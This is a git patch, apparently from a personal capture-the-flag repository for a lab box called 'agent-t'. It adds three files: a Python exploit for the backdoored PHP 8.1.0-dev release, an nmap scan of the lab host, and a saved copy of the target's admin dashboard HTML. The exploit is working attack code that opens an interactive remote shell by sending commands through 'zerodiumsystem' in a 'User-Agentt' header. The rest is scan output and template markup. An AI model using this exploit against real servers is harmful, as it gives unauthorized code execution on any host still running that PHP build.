From 14d0504e13c115f18d0397756dee998cd36436ee Mon Sep 17 00:00:00 2001 From: Raghuram Subramani Date: Sat, 24 Sep 2022 01:51:43 -0400 Subject: add agent-t --- agent-t/exploit.py | 53 ++ agent-t/nmap | 14 + agent-t/response | 1529 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 1596 insertions(+) create mode 100644 agent-t/exploit.py create mode 100644 agent-t/nmap create mode 100644 agent-t/response (limited to 'agent-t') diff --git a/agent-t/exploit.py b/agent-t/exploit.py new file mode 100644 index 0000000..3bd6e9d --- /dev/null +++ b/agent-t/exploit.py @@ -0,0 +1,53 @@ +# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution +# Date: 23 may 2021 +# Exploit Author: flast101 +# Vendor Homepage: https://www.php.net/ +# Software Link: +# - https://hub.docker.com/r/phpdaily/php +# - https://github.com/phpdaily/php +# Version: 8.1.0-dev +# Tested on: Ubuntu 20.04 +# References: +# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a +# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md + +""" +Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ +Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py +Contact: flast101.sec@gmail.com + +An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. +The following exploit uses the backdoor to provide a pseudo shell ont the host. +""" + +#!/usr/bin/env python3 +import os +import re +import requests + +host = input("Enter the full host url:\n") +request = requests.Session() +response = request.get(host) + +if str(response) == '': + print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") + try: + while 1: + cmd = input("$ ") + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", + "User-Agentt": "zerodiumsystem('" + cmd + "');" + } + response = request.get(host, headers = headers, allow_redirects = False) + current_page = response.text + stdout = current_page.split('',1) + text = print(stdout[0]) + except KeyboardInterrupt: + print("Exiting...") + exit() + +else: + print("\r") + print(response) + print("Host is not available, aborting...") + exit() \ No newline at end of file diff --git a/agent-t/nmap b/agent-t/nmap new file mode 100644 index 0000000..6a705a6 --- /dev/null +++ b/agent-t/nmap @@ -0,0 +1,14 @@ +# Nmap 7.93 scan initiated Sat Sep 24 01:44:36 2022 as: nmap -vvv -p 80 -sC -sV -oN nmap 10.10.166.198 +Nmap scan report for 10.10.166.198 +Host is up, received syn-ack (0.21s latency). +Scanned at 2022-09-24 01:44:37 EDT for 17s + +PORT STATE SERVICE REASON VERSION +80/tcp open http syn-ack PHP cli server 5.5 or later (PHP 8.1.0-dev) +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +|_http-title: Admin Dashboard + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Sep 24 01:44:54 2022 -- 1 IP address (1 host up) scanned in 17.45 seconds diff --git a/agent-t/response b/agent-t/response new file mode 100644 index 0000000..d9e400a --- /dev/null +++ b/agent-t/response @@ -0,0 +1,1529 @@ + + + + + + + + + + + + Admin Dashboard + + + + + + + + + + + + + +
+ + + + + + +
+ + +
+ + + + + + +
+ + +
+

Dashboard

+ Generate Report +
+ + +
+ + +
+
+
+
+
+
+ Earnings (Monthly)
+
$40,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Earnings (Annual)
+
$215,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
Tasks +
+
+
+
50%
+
+
+
+
+
+
+
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Pending Requests
+
18
+
+
+ +
+
+
+
+
+
+ + + +
+ + +
+
+ +
+
Earnings Overview
+
+ +
+
Dropdown Header:
+ Action + Another action +
+ Something else here +
+
+
+ +
+
+ +
+
+
+
+ + +
+
+ +
+
Revenue Sources
+
+ +
+
Dropdown Header:
+ Action + Another action +
+ Something else here +
+
+
+ +
+
+ +
+
+ + Direct + + + Social + + + Referral + +
+
+
+
+
+ + +
+ + +
+ + +
+
+
Projects
+
+
+

Server Migration 20%

+
+
+
+

Sales Tracking 40%

+
+
+
+

Customer Database 60%

+
+
+
+

Payout Details 80%

+
+
+
+

Account Setup Complete!

+
+
+
+
+
+ + +
+
+
+
+ Primary +
#4e73df
+
+
+
+
+
+
+ Success +
#1cc88a
+
+
+
+
+
+
+ Info +
#36b9cc
+
+
+
+
+
+
+ Warning +
#f6c23e
+
+
+
+
+
+
+ Danger +
#e74a3b
+
+
+
+
+
+
+ Secondary +
#858796
+
+
+
+
+
+
+ Light +
#f8f9fc
+
+
+
+
+
+
+ Dark +
#5a5c69
+
+
+
+
+ +
+ +
+ + +
+
+
Illustrations
+
+
+
+ ... +
+

Add some quality, svg illustrations to your project courtesy of unDraw, a + constantly updated collection of beautiful svg images that you can use + completely free and without attribution!

+ Browse Illustrations on + unDraw → +
+
+ + +
+
+
Development Approach
+
+
+

SB Admin 2 makes extensive use of Bootstrap 4 utility classes in order to reduce + CSS bloat and poor page performance. Custom CSS classes are used to create + custom components and custom utility classes.

+

Before working with this theme, you should become familiar with the + Bootstrap framework, especially the utility classes.

+
+
+ +
+
+ +
+ + +
+ + + +
+
+
+ Copyright © Your Website 2021 +
+
+
+ + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
* Trying 10.10.166.198:80... + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to 10.10.166.198 (10.10.166.198) port 80 (#0) +> GET / HTTP/1.1 +> Host: 10.10.166.198 +> User-Agent: curl/7.85.0 +> Accept: */* +> +* Mark bundle as not supporting multiuse +< HTTP/1.1 200 OK +< Host: 10.10.166.198 +< Date: Sat, 24 Sep 2022 05:45:57 GMT +< Connection: close +< X-Powered-By: PHP/8.1.0-dev +< Content-type: text/html; charset=UTF-8 +< +{ [1274 bytes data] + + + + + + + + + + + + Admin Dashboard + + + + + + + + + + + + + +
+ + + + + + +
+ + +
+ + + + + + +
+ + +
+

Dashboard

+ Generate Report +
+ + +
+ + +
+
+
+
+
+
+ Earnings (Monthly)
+
$40,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Earnings (Annual)
+
$215,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
Tasks +
+
+
+
50%
+
+
+
+
+
+
+
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Pending Requests
+
18
+
+
+ +
+
+
+
+
+
+ + + +
+ + +
+
+ +
+
Earnings Overview
+
+ +
+
Dropdown Header:
+ Action + Another action +
+ Something else here +
+
+
+ +
+
+ +
+
+
+
+ + +
+
+ +
+
Revenue Sources
+
+ +
+
Dropdown Header:
+ Action + Another action +
+ Something else here +
+
+
+ +
+
+ +
+
+ + Direct + + + Social + + + Referral + +
+
+
+
+
+ + +
+ + +
+ + +
+
+
Projects
+
+
+

Server Migration 20%

+
+
+
+

Sales Tracking 40%

+
+
+
+

Customer Database 60%

+
+
+
+

Payout Details 80%

+
+
+
+

Account Setup Complete!

+
+
+
+
+
+ + +
+
+
+
+ Primary +
#4e73df
+
+
+
+
+
+
+ Success +
#1cc88a
+
+
+
+
+
+
+ Info +
#36b9cc
+
+
+
+
+
+
+ Warning +
#f6c23e
+
+
+
+
+
+
+ Danger +
#e74a3b
+
+
+
+
+
+
+ Secondary +
#858796
+
+
+
+
+
+
+ Light +
#f8f9fc
+
+
+
+
+ 100 40768 0 40768 0 0 45367 0 --:--:-- --:--:-- --:--:-- 45348
+
+ Dark +
#5a5c69
+
+
+
+
+ +
+ +
+ + +
+
+
Illustrations
+
+
+
+ ... +
+

Add some quality, svg illustrations to your project courtesy of unDraw, a + constantly updated collection of beautiful svg images that you can use + completely free and without attribution!

+ Browse Illustrations on + unDraw → +
+
+ + +
+
+
Development Approach
+
+
+

SB Admin 2 makes extensive use of Bootstrap 4 utility classes in order to reduce + CSS bloat and poor page performance. Custom CSS classes are used to create + custom components and custom utility classes.

+

Before working with this theme, you should become familiar with the + Bootstrap framework, especially the utility classes.

+
+
+ +
+
+ +
+ + +
+ + + +
+
+
+ Copyright © Your Website 2021 +
+
+
+ + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
\ No newline at end of file -- cgit v1.2.3